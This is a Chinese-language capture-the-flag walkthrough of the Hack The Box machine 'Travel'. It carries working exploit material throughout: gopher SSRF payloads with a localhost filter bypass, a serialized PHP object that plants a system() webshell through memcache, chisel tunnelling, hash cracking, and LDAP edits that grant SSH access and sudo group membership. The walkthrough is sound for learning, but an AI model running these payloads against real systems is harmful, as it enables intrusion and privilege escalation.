打靶记录(一四三)之HTBTravel

端口扫描

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.189                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 13:12 CST
Nmap scan report for 10.10.10.189
Host is up (0.067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ sudo nmap -sT -sC -sV -O -p22,80,443 10.10.10.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 13:13 CST
Nmap scan report for 10.10.10.189
Host is up (0.061s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d3:9f:31:95:7e:5e:11:45:a2:b4:b6:34:c0:2d:2d:bc (RSA)
|   256 ef:3f:44:21:46:8d:eb:6c:39:9c:78:4f:50:b3:f3:6b (ECDSA)
|_  256 3a:01:bc:f8:57:f5:27:a1:68:1d:6a:3d:4e:bc:21:1b (ED25519)
80/tcp  open  http     nginx 1.17.6
|_http-title: Travel.HTB
|_http-server-header: nginx/1.17.6
443/tcp open  ssl/http nginx 1.17.6
|_http-title: Travel.HTB - SSL coming soon.
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after:  2030-04-21T19:24:29
|_http-server-header: nginx/1.17.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (97%), Linux 3.7 (96%), Linux 3.2.0 (96%), Tomato 1.27 - 1.28 (Linux 2.4.20) (96%), Tomato 1.28 (Linux 2.4.20) (95%), MikroTik RouterOS 6.15 (Linux 3.3.5) (94%), ZoneAlarm Z100G WAP (94%), HP Onboard Administrator 4.01 (93%), HP Onboard Administrator 4.12 - 4.40 (93%), Linux 2.6.32 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.29 seconds

添加hosts

10.10.10.189 www.travel.htb travel.htb blog.travel.htb blog-dev.travel.htb

网站有点多，一共是四个,https似乎尚未开通,blog-dev.travel.htb没有权限访问,blog.travel.htb是一个wordpress。存在一个admin用户,用rockyou跑了一下密码没结果

代码审计

但是发现有一个git仓库暴露 http://blog-dev.travel.htb/.git/ 。dump下来，有两个php文件

template.php:

<?php

/**
 Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
	// this should be secure
	$tmpUrl = urldecode($url);
	if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
	{		
		die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
	}
	if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
	{		
		die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
	}
	$tmp = parse_url($url, PHP_URL_HOST);
	// preventing all localhost access
	if($tmp == "localhost" or $tmp == "127.0.0.1")
	{		
		die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");		
	}
	return $url;
}

function url_get_contents ($url) {
    $url = safe($url);
	$url = escapeshellarg($url);
	$pl = "curl ".$url;
	$output = shell_exec($pl);
    return $output;
}


class TemplateHelper
{

    private $file;
    private $data;

    public function __construct(string $file, string $data)
    {
    	$this->init($file, $data);
    }

    public function __wakeup()
    {
    	$this->init($this->file, $this->data);
    }

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

有一个safe函数,会对url进行关键词筛选，防止SSRF。随后有一个TemplateHelper类，然后一些初始化的魔术方法,这里的wakeup方法在反序列化时被触发,并且init方法会将，data内容写到以file为文件名内，可以尝试写webshell

rss-template.php

<?php
/*
Template Name: Awesome RSS
*/
include('./template.php');
get_header();
?>

<main class="section-inner">
    <?php
    function get_feed($url)
    {
        require_once ABSPATH . '/wp-includes/class-simplepie.php';
        $simplepie = null;
        $data = url_get_contents($url);
        if ($url) {
            $simplepie = new SimplePie();
            $simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
            //$simplepie->set_raw_data($data);
            $simplepie->set_feed_url($url);
            $simplepie->init();
            $simplepie->handle_content_type();
            if ($simplepie->error) {
                error_log($simplepie->error);
                $simplepie = null;
                $failed = True;
            }
        } else {
            $failed = True;
        }
        return $simplepie;
    }

    $url = $_SERVER['QUERY_STRING'];
    if (strpos($url, "custom_feed_url") !== false) {
        $tmp = (explode("=", $url));
        $url = end($tmp);
    } else {
        $url = "http://www.travel.htb/newsfeed/customfeed.xml";
    }
<SNIP>
<!--
DEBUG
<?php
if (isset($_GET['debug'])) {
    include('debug.php');
}
?>
-->

<?php get_template_part('template-parts/footer-menus-widgets'); ?>

<?php
get_footer();

RSS是一个用以聚合多个网站更新的内容到一个网站的功能,根据上述，网站所使用的是wordpress默认的simplepieRSS

simplepie类可以找到:

https://github.com/WordPress/WordPress/blob/master/wp-includes/class-simplepie.php

首先关注get_feed()函数,用于从给定的 URL 获取 RSS feed,还会进行缓存。随后，这个函数就被调用，首先会检测url请求中是否含有”custom_feed_url”参数,然后根据”=”将”=”前后的字符串分割成数组,取最后一个元素作为$url

比如:

<?php
$url = 'http://example.com/?custom_feed_url=xxx';
if (strpos($url, "custom_feed_url") !== false) {
    $tmp = (explode("=", $url));
    var_dump($tmp);
    $url = end($tmp);
} else {
    $url = "http://www.travel.htb/newsfeed/customfeed.xml";
}
print_r($url);

输出的结果是:

[Running] php "c:\Users\mikannse\Desktop\Untitled-1.php"
array(2) {
  [0]=>
  string(35) "http://example.com/?custom_feed_url"
  [1]=>
  string(3) "xxx"
}
xxx

在结尾，会包含一个debug.php,能够传入debug参数,并且能在源码看到像是:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?debug' |grep xct
| xct_4e5612ba07(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |

看形式是memcache中的的序列化之后的字符串。那么思路也就是通过，前面是一串哈希，后面是一个序列化字符串

Getshell

并且这个哈希实际上就是url进行md5哈希然后再次进行哈希。见memcache.php的源码

public function __construct($location, $name, $type) {
    $this->options = array(
        'host'   => '127.0.0.1',
        'port'   => 11211,
        'extras' => array(
            'timeout' => 3600, // one hour
            'prefix'  => 'simplepie_',
        ),
    );
    $this->options = SimplePie_Misc::array_merge_recursive($this->options, SimplePie_Cache::parse_URL($location));

    $this->name = $this->options['extras']['prefix'] . md5("$name:$type");

    $this->cache = new Memcached();
    $this->cache->addServer($this->options['host'], (int)$this->options['port']);
}

那么现在的思路就是通过写入一个序列化字符串到memcache中，然后进行反序列化。但是后面那串序列化不是我们能够控制的，为了直接与memcache://127.0.0.1:11211进行通信，需要配合SSRF

一个很好能帮助ssrfpayload的是: https://github.com/tarunkant/Gopherus ,并且还有带有phpmemcache的利用，只需要输入payload就能生成SSRF的payload

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ ./gopherus.py --exploit phpmemcache

                                                                                                     
  ________              .__                                                                          
 /  _____/  ____ ______ |  |__   ___________ __ __  ______                                           
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/                                           
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \                                            
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >                                           
        \/       |__|        \/     \/                 \/                                            
                                                                                                     
                author: $_SpyD3r_$                                                                   
                                                                                                     

This is usable when you know Class and Variable name used by user

Give serialization payload
example: O:5:"Hello":0:{}   : test payload                                                           

Your gopher link is ready to do SSRF :                                                               
                                                                                                     
gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20payload%0d%0a

After everything done, you can delete memcached item by using this payload:                          
                                                                                                     
gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

-----------Made-by-SpyD3r-----------

但还有一个问题是在template.php中ssrf的127.0.0.1的过滤，但是可以利用16进制表示IP来绕过,先测试一下

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/_%0d%0aset%20SpyD3r%204%200%2012%0d%0atest%20payload%0d%0a'

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?debug' | grep '^| '
| SpyD3r | test payload |

利用之前的templatehelper类编写一个写入webshell的payload:

<?php
class TemplateHelper
{
    public $file;
    public $data;
    public function __construct()
    {
        $this->file = 'shell.php';
        $this->data = '<?php system($_GET["cmd"]); ?>';
    }
}
$obj = new TemplateHelper();
echo serialize($obj);
?>

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ php 1.php 
O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";} 

那么要怎么触发反序列化呢，也就是wakeup方法。当simplepie尝试访问的url在缓存中就会触发。所以要写入的payload中的前面的哈希需要操控。先生成payload

┌──(mikannse㉿kali)-[~/tools/web/Gopherus]
└─$ ./gopherus.py --exploit phpmemcache


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


This is usable when you know Class and Variable name used by user

Give serialization payload
example: O:5:"Hello":0:{}   : O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";} 

Your gopher link is ready to do SSRF :                                                               
                                                                                                     
gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a

After everything done, you can delete memcached item by using this payload:                          
                                                                                                     
gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a

-----------Made-by-SpyD3r-----------

将payload进行url解码的结果是:

set SpyD3r 4 0 103
O:14:"TemplateHelper":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";} 

只需要将SpyD3r(这个工具的作者)改成所访问的url的哈希就可以,这个路由是可以随便填的，那么就本地开一个web服务器来作为路由

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ echo -n "$(echo -n 'http://10.10.14.13:8000/' | md5sum | cut -d' ' -f1):spc" | md5sum
9e80b1122657c41da80bc26babf4758b  -

那么只需要将SpyD3r改成xct_9e80b1122657c41da80bc26babf4758b就行,那么传入的payload应当是:

gopher://2130706433:11211/_%0d%0aset%20xct_9e80b1122657c41da80bc26babf4758b%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a

写入序列化字符串到memcache:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/_%0d%0aset%20xct_9e80b1122657c41da80bc26babf4758b%204%200%20103%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:9:%22shell.php%22%3Bs:4:%22data%22%3Bs:30:%22%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a'>/dev/null

然后触发反序列化:

┌──(mikannse㉿kali)-[~]
└─$ curl -s 'http://blog.travel.htb/awesome-rss/?custom_feed_url&url=http://10.10.14.13:8000/' > /dev/null

webshell的路径是在__DIR_./logs/shell.php

__DIR__具体可以在之前.git仓库中的README看到是wp-content/themes/twentytwenty

那么webshell应当在 http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

┌──(mikannse㉿kali)-[~]
└─$ curl 'http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php?cmd=whoami'
www-data

成功!!

做一个反弹shell

提权

看一下ip发现竟然在容器当中,在wp-config.php得到数据库凭证

/** MySQL database username */
define( 'DB_USER', 'wp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );

但由于shell不完整，机器上也没有python,为了连接数据库那只能做端口转发了

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ ./chisel server -p 10000 --reverse                  
2024/09/12 19:15:34 server: Reverse tunnelling enabled
2024/09/12 19:15:34 server: Fingerprint maha+AY0Cl6xcZuNtZFb+EIgAoGvCza/5/AJV7DEhKY=
2024/09/12 19:15:34 server: Listening on http://0.0.0.0:10000

www-data@blog:/tmp$ ./chisel client 10.10.14.13:10000 R:3306:127.0.0.1:3306 &
./chisel client 10.10.14.13:10000 R:3306:127.0.0.1:3306 &
[1] 442
www-data@blog:/tmp$ 2024/09/12 11:05:51 client: Connecting to ws://10.10.14.13:10000
2024/09/12 11:05:52 client: Connected (Latency 64.784414ms)

┌──(mikannse㉿kali)-[~]
└─$ mysql -h 10.10.14.13 -p3306 -uwp -p --skip-ssl
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5212
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

得到:

admin      | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/

但是rockyou跑不出来，但是发现/opt里面还有一个wordpress,里面有一个sql文件的备份

/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/','admin','admin@travel.htb','http://localhost','2020-04-13 13:19:01','',0,'admin'),(2,'lynik-admin','$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.','lynik-admin','lynik@travel.htb','','2020-04-13 13:36:18','',0,'Lynik Schmidt');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;

┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ echo '$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.'>hash
                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/travel]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1stepcloser      (?)     
1g 0:00:00:15 DONE (2024-09-12 19:24) 0.06591g/s 48170p/s 48170c/s 48170C/s 1stuna..1lovemac
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed. 

得到lynik-admin:1stepcloser,ssh直接登录，发现内网还开了35467端口

家目录有一个.ldaprc,看上去是ldap客户端的配置文件，并且服务器似乎是开在一个容器当中

lynik-admin@travel:~$ ping ldap.travel.htb
PING ldap.travel.htb (172.20.0.10) 56(84) bytes of data.
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=1 ttl=64 time=0.063 ms
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=2 ttl=64 time=0.040 ms
64 bytes from ldap.travel.htb (172.20.0.10): icmp_seq=3 ttl=64 time=0.050 ms

除此之外在.viminfo中还能找到已被删除的bind连接ldap所用的密码:Theroadlesstraveled,查询上面的所有对象

lynik-admin@travel:~$ ldapsearch -x -h 172.20.0.10 -b "dc=travel,dc=htb" -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled "(objectClass=*)" *
# extended LDIF
#
# LDAPv3
# base <dc=travel,dc=htb> with scope subtree
# filter: (objectClass=*)
# requesting: user.txt 
#

# travel.htb
dn: dc=travel,dc=htb

# admin, travel.htb
dn: cn=admin,dc=travel,dc=htb

# servers, travel.htb
dn: ou=servers,dc=travel,dc=htb

# lynik-admin, travel.htb
dn: cn=lynik-admin,dc=travel,dc=htb

# workstations, travel.htb
dn: ou=workstations,dc=travel,dc=htb

# linux, servers, travel.htb
dn: ou=linux,ou=servers,dc=travel,dc=htb

# windows, servers, travel.htb
dn: ou=windows,ou=servers,dc=travel,dc=htb

# users, linux, servers, travel.htb
dn: ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# groups, linux, servers, travel.htb
dn: ou=groups,ou=linux,ou=servers,dc=travel,dc=htb

# jane, users, linux, servers, travel.htb
dn: uid=jane,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# brian, users, linux, servers, travel.htb
dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# frank, users, linux, servers, travel.htb
dn: uid=frank,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# jerry, users, linux, servers, travel.htb
dn: uid=jerry,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# lynik, users, linux, servers, travel.htb
dn: uid=lynik,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# edward, users, linux, servers, travel.htb
dn: uid=edward,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# eugene, users, linux, servers, travel.htb
dn: uid=eugene,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# gloria, users, linux, servers, travel.htb
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# johnny, users, linux, servers, travel.htb
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# louise, users, linux, servers, travel.htb
dn: uid=louise,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# christopher, users, linux, servers, travel.htb
dn: uid=christopher,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

# domainusers, groups, linux, servers, travel.htb
dn: cn=domainusers,ou=groups,ou=linux,ou=servers,dc=travel,dc=htb

# search result
search: 2
result: 0 Success

# numResponses: 22
# numEntries: 21

但是没有什么用,当查看ssh_config时，有别的结果

lynik-admin@travel:~$ cat /etc/ssh/sshd_config | grep -v '^#' | grep . 
Include /etc/ssh/sshd_config.d/*.conf
AuthorizedKeysCommand /usr/bin/sss_ssh_authorizedkeys
AuthorizedKeysCommandUser nobody
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp  /usr/lib/openssh/sftp-server
PasswordAuthentication no
Match User trvl-admin,lynik-admin
        PasswordAuthentication yes

可以利用/usr/bin/sss_ssh_authorizedkeys来查看用户的公钥,那么能够通过ldap将kali的公钥写到一个用户中，就能连接这个用户了

创建一个ldif文件:

lynik-admin@travel:/tmp$ cat ssh.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIgMc9PZn06GOz/V2GQ6aGKeqW+XoM9c80QdGimbPCL mikannse@kali

然后添加条目:

lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/ssh.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

lynik-admin@travel:/tmp$ /usr/bin/sss_ssh_authorizedkeys johnny
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIgMc9PZn06GOz/V2GQ6aGKeqW+XoM9c80QdGimbPCL mikannse@kali

发现johnny这个用户有公钥了,在kali本地能够ssh上去,接下来要做的是给这个用户添加ssh密码和添加到sudo组

lynik-admin@travel:/tmp$ cat sudo.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: gidNumber
gidNumber: 27

lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/sudo.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

lynik-admin@travel:/tmp$ cat pass.ldif 
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: userPassword
userPassword: hacker

lynik-admin@travel:/tmp$ ldapmodify -x -h ldap.travel.htb -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f /tmp/pass.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

现在，我们是root!

johnny@travel:~$ sudo su
[sudo] password for johnny: 
root@travel:/home@TRAVEL/johnny# id
uid=0(root) gid=0(root) groups=0(root)

碎碎念

本想随便挑一个反序列化房间打打的，结果挑了个地狱难度的，可以说是所有打过的靶机难度数一数二的了。但没办法自己选的跪着也要做完，看着WP，然后自己本地边调试审php，也是硬啃下来了。SSRF加反序列化，还有源码审计，其实我已经偷了一点点懒没有审simplepie的源码了。内网的ldap对我也是很新的东西。